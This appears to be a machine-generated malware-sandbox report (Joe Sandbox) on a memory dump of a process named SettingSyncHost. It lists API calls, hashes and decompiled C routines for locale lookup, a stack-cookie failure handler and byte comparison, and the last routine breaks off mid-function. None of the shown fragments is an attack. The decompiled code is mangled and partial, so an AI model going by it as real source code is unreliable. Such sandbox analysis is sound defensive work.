                                                                                                                                      • Instruction Fuzzy Hash: 2AD23971E0862CCBDB66CE28DD407EAB7B9EB44305F1545EAD90DE7240E778AE818F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,003EE7B7,00000002,00000000,?,?,?,003EE7B7,?,00000000), ref: 003EE532
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,003EE7B7,00000002,00000000,?,?,?,003EE7B7,?,00000000), ref: 003EE55B
                                                                                                                                      • GetACP.KERNEL32(?,?,003EE7B7,?,00000000), ref: 003EE570
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039AC3E(void* __edi, char* __esi) {
                                                                                                                                      				short _v8;
                                                                                                                                      				void* _t24;
                                                                                                                                      
                                                                                                                                      				_t24 = __edi;
                                                                                                                                      				if(__esi == 0 ||  *__esi == 0 || E0039AB40(__esi, ?str?) == 0) {
                                                                                                                                      					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
                                                                                                                                      						if(_v8 != 0) {
                                                                                                                                      							goto L5;
                                                                                                                                      						} else {
                                                                                                                                      							return GetACP();
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						goto L8;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					if(E0039AB40(__esi, ?str?) != 0) {
                                                                                                                                      						_v8 = E003A2D16(__esi);
                                                                                                                                      						goto L5;
                                                                                                                                      					} else {
                                                                                                                                      						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
                                                                                                                                      							L8:
                                                                                                                                      							return 0;
                                                                                                                                      						} else {
                                                                                                                                      							L5:
                                                                                                                                      							return _v8;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}






                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000,00000000), ref: 0039AC7D
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000,00000000), ref: 0039ACA6
                                                                                                                                      • GetACP.KERNEL32(?,?,0039B2A7,?,00394307,?,000000BC,?,00000001,00000000), ref: 0039ACBA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003EE77A
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 003EE7C3
                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 003EE7D2
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003EE81A
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003EE839
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 949163717-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                      			E00393C21(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                      				intOrPtr _v0;
                                                                                                                                      				void* _v804;
                                                                                                                                      				intOrPtr _v808;
                                                                                                                                      				intOrPtr _v812;
                                                                                                                                      				intOrPtr _t6;
                                                                                                                                      				intOrPtr _t12;
                                                                                                                                      				intOrPtr _t13;
                                                                                                                                      				long _t17;
                                                                                                                                      				intOrPtr _t21;
                                                                                                                                      				intOrPtr _t22;
                                                                                                                                      				intOrPtr _t25;
                                                                                                                                      				intOrPtr _t26;
                                                                                                                                      				intOrPtr _t27;
                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                      				void* _t34;
                                                                                                                                      
                                                                                                                                      				_t27 = __esi;
                                                                                                                                      				_t26 = __edi;
                                                                                                                                      				_t25 = __edx;
                                                                                                                                      				_t22 = __ecx;
                                                                                                                                      				_t21 = __ebx;
                                                                                                                                      				_t6 = __eax;
                                                                                                                                      				_t34 = _t22 -  *0x3c7040; // 0xbb40e64e
                                                                                                                                      				if(_t34 == 0) {
                                                                                                                                      					asm("repe ret");
                                                                                                                                      				}
                                                                                                                                      				 *0x4ed9a0 = _t6;
                                                                                                                                      				 *0x4ed99c = _t22;
                                                                                                                                      				 *0x4ed998 = _t25;
                                                                                                                                      				 *0x4ed994 = _t21;
                                                                                                                                      				 *0x4ed990 = _t27;
                                                                                                                                      				 *0x4ed98c = _t26;
                                                                                                                                      				 *0x4ed9b8 = ss;
                                                                                                                                      				 *0x4ed9ac = cs;
                                                                                                                                      				 *0x4ed988 = ds;
                                                                                                                                      				 *0x4ed984 = es;
                                                                                                                                      				 *0x4ed980 = fs;
                                                                                                                                      				 *0x4ed97c = gs;
                                                                                                                                      				asm("pushfd");
                                                                                                                                      				_pop( *0x4ed9b0);
                                                                                                                                      				 *0x4ed9a4 =  *_t31;
                                                                                                                                      				 *0x4ed9a8 = _v0;
                                                                                                                                      				 *0x4ed9b4 =  &_a4;
                                                                                                                                      				 *0x4ed8f0 = 0x10001;
                                                                                                                                      				 *0x4ed8a4 =  *0x4ed9a8;
                                                                                                                                      				 *0x4ed898 = 0xc0000409;
                                                                                                                                      				 *0x4ed89c = 1;
                                                                                                                                      				_t12 =  *0x3c7040; // 0xbb40e64e
                                                                                                                                      				_v812 = _t12;
                                                                                                                                      				_t13 =  *0x3c7044; // 0x44bf19b1
                                                                                                                                      				_v808 = _t13;
                                                                                                                                      				 *0x4ed8e8 = IsDebuggerPresent();
                                                                                                                                      				_push(1);
                                                                                                                                      				E003A1C07(_t14);
                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x3bfeb8);
                                                                                                                                      				if( *0x4ed8e8 == 0) {
                                                                                                                                      					_push(1);
                                                                                                                                      					E003A1C07(_t17);
                                                                                                                                      				}
                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                      			}



















                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0039788E
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003978A3
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(003BFEB8), ref: 003978AE
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 003978CA
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 003978D1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: f4f5f6e2eae4fb85b456ad6acc76be4ce5a33296c9ec7a5f56e147af6db274bd
                                                                                                                                      • Instruction ID: 28adabd3b7f021eb6c887f4974a449c986645d037c58346cc83cb6ae3bc1a375
                                                                                                                                      • Opcode Fuzzy Hash: f4f5f6e2eae4fb85b456ad6acc76be4ce5a33296c9ec7a5f56e147af6db274bd
                                                                                                                                      • Instruction Fuzzy Hash: F321CAB9806284DFDB41EF28EC89A643BF4FB48315F11107AE8588F263E7B55980CF19
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: b)?$b)?
                                                                                                                                      • API String ID: 0-347368682
                                                                                                                                      • Opcode ID: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
                                                                                                                                      • Instruction ID: 42ebcbecc6eeb58869eb655d5fbd71bf987a6b19910dfa7ece792d77b9454ba0
                                                                                                                                      • Opcode Fuzzy Hash: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
                                                                                                                                      • Instruction Fuzzy Hash: 02F14F71E002699FDF15CFA9D8806ADBBB1FF88314F158269E915AB384D731AD41CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003D9963
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 003D9A2F
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003D9A4F
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 003D9A59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 2b45c799e118a6a200ea030c57e30b3da0d54bb63d7625d515a66dffe420b4e2
                                                                                                                                      • Instruction ID: d44d036f4b86c6848abc16fbb13f6434ca0dc39151970071b7b5736f3d2a0cee
                                                                                                                                      • Opcode Fuzzy Hash: 2b45c799e118a6a200ea030c57e30b3da0d54bb63d7625d515a66dffe420b4e2
                                                                                                                                      • Instruction Fuzzy Hash: 9631FA75D0521C9BDB21DF64D9497DDBBB8AF04300F10419AE40DAB250EB719A85CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5A72
                                                                                                                                        • Part of subcall function 003E5A10: _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE174
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE1BE
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003EE284
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3140898709-0
                                                                                                                                      • Opcode ID: 312c541c0a3257b2c03d60cba42ad671f4a48792f830fe9c78b977caa1acee8e
                                                                                                                                      • Instruction ID: 941bbfeda4f4dedf00e49acc98f78883cab8493d41f0c5e06e212653258b5149
                                                                                                                                      • Opcode Fuzzy Hash: 312c541c0a3257b2c03d60cba42ad671f4a48792f830fe9c78b977caa1acee8e
                                                                                                                                      • Instruction Fuzzy Hash: B061A0715001679FDF2AAF26CD82BBA77A9FF04300F15467AEA15CA6C1E734D984CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003DE17B
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003DE185
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003DE192
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,003E1059,?,?,?,?,?,003DE33E), ref: 003E107C
                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,003E1059,?,?,?,?,?,003DE33E), ref: 003E1083
                                                                                                                                      • ExitProcess.KERNEL32 ref: 003E1095
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EE120,00000001,00000000,?,-00000050,?,003EE74E,00000000,?,?,?,00000055,?), ref: 003EE06C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID: N>
                                                                                                                                      • API String ID: 2417226690-4059378728
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • InternetReadFile.WININET(?,?,000003FF,00000000), ref: 003D7DE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003E71FF,?,?,00000008,?,?,003F4D4F,00000000), ref: 003E7431
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                      			E0039C8A0(signed char* _a4, char _a8, signed int _a12) {
                                                                                                                                      				signed int _t984;
                                                                                                                                      				void* _t986;
                                                                                                                                      				signed int _t988;
                                                                                                                                      				void* _t989;
                                                                                                                                      				void* _t991;
                                                                                                                                      				void* _t993;
                                                                                                                                      				void* _t994;
                                                                                                                                      				void* _t996;
                                                                                                                                      				void* _t998;
                                                                                                                                      				void* _t1001;
                                                                                                                                      				void* _t1003;
                                                                                                                                      				void* _t1005;
                                                                                                                                      				signed char* _t1006;
                                                                                                                                      				void* _t1007;
                                                                                                                                      				signed int _t1108;
                                                                                                                                      				signed char* _t1111;
                                                                                                                                      				signed char* _t1112;
                                                                                                                                      				signed char* _t1113;
                                                                                                                                      				signed char* _t1114;
                                                                                                                                      				void* _t1134;
                                                                                                                                      				signed int _t1135;
                                                                                                                                      				void* _t1136;
                                                                                                                                      				signed char* _t1137;
                                                                                                                                      				signed char* _t1138;
                                                                                                                                      				signed char* _t1139;
                                                                                                                                      				void* _t1149;
                                                                                                                                      				void* _t1151;
                                                                                                                                      				void* _t1153;
                                                                                                                                      				void* _t1156;
                                                                                                                                      				void* _t1158;
                                                                                                                                      				void* _t1160;
                                                                                                                                      				void* _t1163;
                                                                                                                                      				void* _t1165;
                                                                                                                                      				void* _t1167;
                                                                                                                                      				void* _t1170;
                                                                                                                                      				void* _t1172;
                                                                                                                                      				void* _t1174;
                                                                                                                                      				void* _t1177;
                                                                                                                                      				void* _t1179;
                                                                                                                                      				void* _t1181;
                                                                                                                                      				void* _t1184;
                                                                                                                                      				void* _t1186;
                                                                                                                                      				void* _t1188;
                                                                                                                                      				void* _t1191;
                                                                                                                                      				void* _t1193;
                                                                                                                                      				void* _t1195;
                                                                                                                                      				void* _t1198;
                                                                                                                                      				void* _t1200;
                                                                                                                                      				void* _t1202;
                                                                                                                                      
                                                                                                                                      				_t1135 = _a12;
                                                                                                                                      				_t984 = _t1135;
                                                                                                                                      				if(_t984 == 0) {
                                                                                                                                      					asm("rcr byte [edi+0x5e], 0x5d");
                                                                                                                                      					return 0;
                                                                                                                                      				}
                                                                                                                                      				_t986 = _t984 - 1;
                                                                                                                                      				if(_t986 == 0) {
                                                                                                                                      					_t982 =  &_a8; // 0x39462f
                                                                                                                                      					_t988 =  *_a4 & 0x000000ff;
                                                                                                                                      					_t1108 =  *( *_t982) & 0x000000ff;
                                                                                                                                      					L426:
                                                                                                                                      					_t989 = _t988 - _t1108;
                                                                                                                                      					if(_t989 == 0) {
                                                                                                                                      						L439:
                                                                                                                                      						return _t989;
                                                                                                                                      					}
                                                                                                                                      					_t958 = (0 | _t989 > 0x00000000) - 1; // -1
                                                                                                                                      					return (_t989 > 0) + _t958;
                                                                                                                                      				}
                                                                                                                                      				_t991 = _t986 - 1;
                                                                                                                                      				if(_t991 == 0) {
                                                                                                                                      					_t1111 = _a4;
                                                                                                                                      					_t974 =  &_a8; // 0x39462f
                                                                                                                                      					_t1137 =  *_t974;
                                                                                                                                      					_t993 = ( *_t1111 & 0x000000ff) - ( *_t1137 & 0x000000ff);
                                                                                                                                      					if(_t993 == 0) {
                                                                                                                                      						L435:
                                                                                                                                      						_t988 = _t1111[1] & 0x000000ff;
                                                                                                                                      						_t1108 = _t1137[1] & 0x000000ff;
                                                                                                                                      						goto L426;
                                                                                                                                      					}
                                                                                                                                      					_t978 = (0 | _t993 > 0x00000000) - 1; // -1
                                                                                                                                      					_t989 = (_t993 > 0) + _t978;
                                                                                                                                      					if(_t989 != 0) {
                                                                                                                                      						goto L439;
                                                                                                                                      					}
                                                                                                                                      					goto L435;
                                                                                                                                      				}
                                                                                                                                      				_t994 = _t991 - 1;
                                                                                                                                      				if(_t994 == 0) {
                                                                                                                                      					_t1112 = _a4;
                                                                                                                                      					_t960 =  &_a8; // 0x39462f
                                                                                                                                      					_t1138 =  *_t960;
                                                                                                                                      					_t996 = ( *_t1112 & 0x000000ff) - ( *_t1138 & 0x000000ff);
                                                                                                                                      					if(_t996 == 0) {
                                                                                                                                      						L430:
                                                                                                                                      						_t998 = (_t1112[1] & 0x000000ff) - (_t1138[1] & 0x000000ff);
                                                                                                                                      						if(_t998 == 0) {
                                                                                                                                      							L432:
                                                                                                                                      							_t988 = _t1112[2] & 0x000000ff;
                                                                                                                                      							_t1108 = _t1138[2] & 0x000000ff;
                                                                                                                                      							goto L426;
                                                                                                                                      						}
                                                                                                                                      						_t970 = (0 | _t998 > 0x00000000) - 1; // -1
                                                                                                                                      						_t989 = (_t998 > 0) + _t970;
                                                                                                                                      						if(_t989 != 0) {
                                                                                                                                      							goto L439;
                                                                                                                                      						}
                                                                                                                                      						goto L432;
                                                                                                                                      					}
                                                                                                                                      					_t964 = (0 | _t996 > 0x00000000) - 1; // -1
                                                                                                                                      					_t989 = (_t996 > 0) + _t964;
                                                                                                                                      					if(_t989 != 0) {
                                                                                                                                      						goto L439;
                                                                                                                                      					}
                                                                                                                                      					goto L430;
                                                                                                                                      				}
                                                                                                                                      				if(_t994 == 1) {
                                                                                                                                      					_t1113 = _a4;
                                                                                                                                      					_t936 =  &_a8; // 0x39462f
                                                                                                                                      					_t1139 =  *_t936;
                                                                                                                                      					_t1001 = ( *_t1113 & 0x000000ff) - ( *_t1139 & 0x000000ff);
                                                                                                                                      					if(_t1001 == 0) {
                                                                                                                                      						L421:
                                                                                                                                      						_t1003 = (_t1113[1] & 0x000000ff) - (_t1139[1] & 0x000000ff);
                                                                                                                                      						if(_t1003 == 0) {
                                                                                                                                      							L423:
                                                                                                                                      							_t1005 = (_t1113[2] & 0x000000ff) - (_t1139[2] & 0x000000ff);
                                                                                                                                      							if(_t1005 == 0) {
                                                                                                                                      								L425:
                                                                                                                                      								_t988 = _t1113[3] & 0x000000ff;
                                                                                                                                      								_t1108 = _t1139[3] & 0x000000ff;
                                                                                                                                      								goto L426;
                                                                                                                                      							}
                                                                                                                                      							_t952 = (0 | _t1005 > 0x00000000) - 1; // -1
                                                                                                                                      							_t989 = (_t1005 > 0) + _t952;
                                                                                                                                      							if(_t989 != 0) {
                                                                                                                                      								goto L439;
                                                                                                                                      							}
                                                                                                                                      							goto L425;
                                                                                                                                      						}
                                                                                                                                      						_t946 = (0 | _t1003 > 0x00000000) - 1; // -1
                                                                                                                                      						_t989 = (_t1003 > 0) + _t946;
                                                                                                                                      						if(_t989 != 0) {
                                                                                                                                      							goto L439;
                                                                                                                                      						}
                                                                                                                                      						goto L423;
                                                                                                                                      					}
                                                                                                                                      					_t940 = (0 | _t1001 > 0x00000000) - 1; // -1
                                                                                                                                      					_t989 = (_t1001 > 0) + _t940;
                                                                                                                                      					if(_t989 != 0) {
                                                                                                                                      						goto L439;
                                                                                                                                      					}
                                                                                                                                      					goto L421;
                                                                                                                                      				} else {
                                                                                                                                      					_t2 =  &_a8; // 0x39462f
                                                                                                                                      					_t1114 =  *_t2;
                                                                                                                                      					_t1006 = _a4;
                                                                                                                                      					_t1134 = 0x20;
                                                                                                                                      					while(_t1135 >= _t1134) {
                                                                                                                                      						if( *_t1006 ==  *_t1114) {
                                                                                                                                      							_t1136 = 0;
                                                                                                                                      							L16:
                                                                                                                                      							if(_t1136 != 0) {
                                                                                                                                      								L98:
                                                                                                                                      								_t1007 = _t1136;
                                                                                                                                      								L178:
                                                                                                                                      								return _t1007;
                                                                                                                                      							}
                                                                                                                                      							if(_t1006[4] == _t1114[4]) {
                                                                                                                                      								_t1136 = 0;
                                                                                                                                      								L27:
                                                                                                                                      								if(_t1136 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								if(_t1006[8] == _t1114[8]) {
                                                                                                                                      									_t1136 = 0;
                                                                                                                                      									L38:
                                                                                                                                      									if(_t1136 != 0) {
                                                                                                                                      										goto L98;
